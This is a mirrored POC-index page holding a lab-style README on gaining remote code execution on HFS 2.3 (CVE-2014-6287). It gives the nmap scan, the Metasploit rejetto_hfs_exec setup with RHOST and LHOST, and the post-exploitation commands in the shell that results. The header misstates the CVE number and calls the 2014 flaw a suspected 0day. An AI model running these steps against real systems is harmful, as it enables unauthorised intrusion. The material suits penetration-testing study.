POC详情: a8ada9dc1f99b4da259d8eb39a09cd54067ed354

来源
https://github.com/sage954526/HFS_EXPLOIT_PROJECT
关联漏洞

疑似Oday

描述
Metasploit RCE on HFS 2.3 - CVE-2014-62
介绍
# HFS_EXPLOIT_PROJECT
Metasploit RCE on HFS 2.3 - CVE-2014-62




🔖 Title of the Project

    > Remote Code Execution via HTTP File Server (HFS 2.3)


⚙ Tools Used
	• Kali Linux
	• Nmap
	• Metasploit
	• Target: HFS 2.3 on Windows 7


 
🔐 Vulnerability Details
        • Name: CVE-2014-6287
	• Type: Remote Code Execution
	• Cause: Unvalidated input in HFS scripting
	• Impact: Unauthenticated shell access



🔍 Methodology (Step-by-Step)

🔹 Step 1: Information Gathering (Nmap)

	•    nmap -sV demo.ine.local (ip of target) 
	•    open port found : 80
	•    service : rejetto HTTP file server 2.3

## Nmap Scan
![Nmap](screenshots/nmap.png)


  
🔹 Step 2: Exploitation (Metasploit)

	• Msfconsole
	• Search for HFS or rejetto
	• use exploit/windows/http/rejetto_hfs_exec
	• set RHOST 192.168.1.100
	• set RPORT 80
	• set LHOST 192.168.1.101
	• run

## Exploit Setup
![Exploit](screenshots/msf.png)
![Exploit](screenshots/searchhfs.png)
    

🔹 Step 3: Post-Exploitation

after run you will get meterpreter session
use command : shell 


• whoami
• ipconfig
• dir

## Shell Access
![Shell](screenshots/whoami.png)

![Shell](screenshots/ipconfig.png)**
文件快照

 [4.0K]  /data/pocs/a8ada9dc1f99b4da259d8eb39a09cd54067ed354
├── [1.2K]  README.md
└── [4.0K]  screenshots
    ├── [207K]  ipconfig.png
    ├── [460K]  msf.png
    ├── [806K]  nmap.png
    ├── [188K]  search hts.png
    ├── [188K]  serach hfs.png
    └── [173K]  whoami.png

1 directory, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。